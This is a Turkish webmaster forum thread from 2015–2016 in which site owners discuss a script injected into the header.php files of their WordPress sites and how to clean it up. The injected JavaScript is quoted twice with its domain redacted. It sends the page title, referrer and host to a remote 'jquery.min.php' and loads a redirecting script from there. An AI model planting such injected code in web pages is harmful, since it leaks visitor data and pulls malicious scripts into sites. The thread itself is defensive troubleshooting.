Uzun zamandır sitelerime bulaşan virüsü temizlemeye çalışıyorum önceden trojan uyarısı veriyordu kaypersky onu hallettim ama şimdide sunucudaki 20 den fazla sitelerimin header.php bölümüne aynı anda bu kodu basıyor siteye girildiği zaman bişey yok başka sayfaya geçmeye çalısınca yada belli bir süre sonra xxxx yazıdıgım siteye bağlanıyor diyor bu sorundan nasıl kurtulabilirim aşağıdaki kod tam olarak ne anlama geliyor?
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "xxxxx/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "xxxxx/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
Bu kodun anlamı nedir?
7
●1.122
- 21-10-2015, 12:06:44
- 21-10-2015, 13:55:36Merhaba,
o virus şuan bulunduğumuz bu forum içeriği sayfasına bulaşmış olsaydı sayfaya script src ile şunu çekecekti ;
xxxxx/js/jquery.min.php?c_utt=snt2014&c_utm=xxxxx/js/jquery.min.php?default_keyword=Bu%20kodun%20anlam% C4%B1%20nedir%3F&se_referrer=http%3A%2F%2Fwww.r10. net%2Fphp%2F&source=www.r10.net
eğer tüm kodlarda bu snt2014 şekilde bi rutin varsa sunucu tarafında içinde bu metin geçen dosyalar bulunup işlem yapabilir.
ne yaptığını öğrenmek için yukarıdaki örnek linke girip kodlara bakmak gerek.
tez zamanda çözersiniz umarım.
kolaylıklar - 24-10-2015, 17:52:40Kodlar dışardan trojanlı bir siteye yönlendiriyor kendi siteme değil, şu an sunucudaki bütün sitelerimi temizleyerek başka bir sunucuya aktarmaktan başka çarem kalmadığı için bu işlemi yapıyorumbluexpres adlı üyeden alıntı: mesajı görüntüle
- 23-11-2015, 21:44:10Aynı durum benim bir arkadaşın sitesinde de var.Tema header.php'sine kod yazıyor.Aynı zamanda sunucuya shell script vb.. base 64 şifreli dosya da yükleniyor.Host firması açık yok diyor.Tema üreticisi açık yok diyor.Ftp, site admin şifrelerini değiştirdim.Ancak 2 kez eklendi.Siz sorunu çözebildiniz mi?
- 30-11-2015, 17:28:27Temiz bir kurulumla siteleri taşımakla buldum çözümügarbiyar adlı üyeden alıntı: mesajı görüntüle
- 07-06-2016, 21:35:55Kısa vadede header.php'ye yazma iznini kaldırabilirsiniz.Sonrasında ftp'deki tüm dosyaları silip, Wordpress dosyalarını tema vb dosyalarının temiz hallerini ftp'ye yeniden yüklemekle çözülüyor